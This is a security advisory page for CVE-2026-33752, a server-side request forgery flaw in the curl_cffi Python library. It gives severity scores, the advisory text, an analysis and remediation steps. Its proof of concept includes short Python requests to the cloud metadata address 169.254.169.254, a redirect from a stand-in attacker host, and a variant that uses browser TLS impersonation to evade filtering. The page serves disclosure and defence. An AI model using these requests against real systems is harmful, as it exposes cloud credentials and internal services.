Skip to main content

Python CVE-2026-33752

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-04-03 https://github.com/lexiforest/curl_cffi GHSA-qw2m-4pqf-rmpp
8.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.6 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Patch released
Apr 04, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 03, 2026 - 22:15 vuln.today
CVE Published
Apr 03, 2026 - 21:36 nvd
HIGH 8.6

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1,922 pypi packages depend on curl-cffi (603 direct, 1,329 indirect)

Ecosystem-wide dependent count for version 0.15.0.

DescriptionGitHub Advisory

Summary

curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.

Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

Details

The issue comes from how curl_cffi handles outbound requests

  • User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
  • Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
  • There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can

  • Provide a URL pointing to an attacker-controlled server
  • Return a redirect response pointing to an internal service
  • Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

PoC

  1. Direct internal request
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. Redirect to internal service

Attacker server:

GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

Victim code:

import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

Result

  • Initial request goes to attacker server
  • Redirect is returned
  • libcurl follows the redirect automatically
  • Internal metadata endpoint is accessed
  1. With TLS impersonation
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

In some environments, this may help the request bypass TLS-based filtering controls.

Impact

An attacker who can control the requested URL may be able to:

  • Access internal network services
  • Reach cloud metadata endpoints and retrieve sensitive information
  • Bypass certain outbound filtering mechanisms (depending on environment)

This corresponds to CWE-918 Server-Side Request Forgery.

AnalysisAI

Server-Side Request Forgery in curl_cffi Python library allows unauthenticated remote attackers to access internal network resources and cloud metadata endpoints via attacker-controlled redirect chains. The library passes user-supplied URLs directly to libcurl without validating destination IP ranges and follows redirects automatically (CURLOPT_FOLLOWLOCATION enabled), enabling access to services like AWS/GCP metadata APIs (169.254.169.254). TLS fingerprint impersonation features (e.g., 'impersonate=chrome') can disguise these requests as legitimate browser traffic, potentially bypassing network controls. EPSS data not available; no active exploitation confirmed (not in CISA KEV); functional proof-of-concept publicly disclosed in GitHub advisory.

Technical ContextAI

curl_cffi is a Python binding for libcurl that provides browser TLS fingerprinting capabilities. The vulnerability (CWE-918) stems from the library's design where user-controlled URLs are forwarded to the underlying libcurl engine without Python-layer validation of destination IP addresses or redirect targets. LibCurl's automatic redirect following (CURLOPT_FOLLOWLOCATION flag set to 1) operates below the Python abstraction layer, creating a blind spot where redirect chains can pivot from external attacker-controlled servers to internal RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local addresses (169.254.0.0/16), or loopback interfaces (127.0.0.0/8). The TLS impersonation feature, while designed for legitimate web scraping and testing, generates ClientHello fingerprints matching popular browsers, potentially evading network security controls that allowlist browser-like traffic patterns while blocking non-browser HTTP clients.

RemediationAI

Monitor the official GitHub Security Advisory at https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp for vendor-released patch announcements with specific fixed version numbers; patch status not confirmed from available data at time of analysis. Until patched versions are available, implement application-layer URL validation before passing URLs to curl_cffi: parse and validate destination hostnames and IP addresses against allowlists, explicitly reject requests to RFC1918 private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local addresses (169.254.0.0/16), loopback ranges (127.0.0.0/8), and IPv6 equivalents. Disable automatic redirect following where possible by reviewing curl_cffi options or implementing custom redirect handling with destination validation at each hop. For cloud deployments, enforce network-layer controls: configure security groups or firewall rules preventing egress to metadata service IPs (169.254.169.254), implement IMDSv2 requiring session tokens on AWS EC2 instances, and enable metadata service protection features on GCP and Azure. Consider replacing curl_cffi with libraries offering built-in SSRF protections or wrapping requests in a proxy service that validates all outbound destinations.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-33752 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy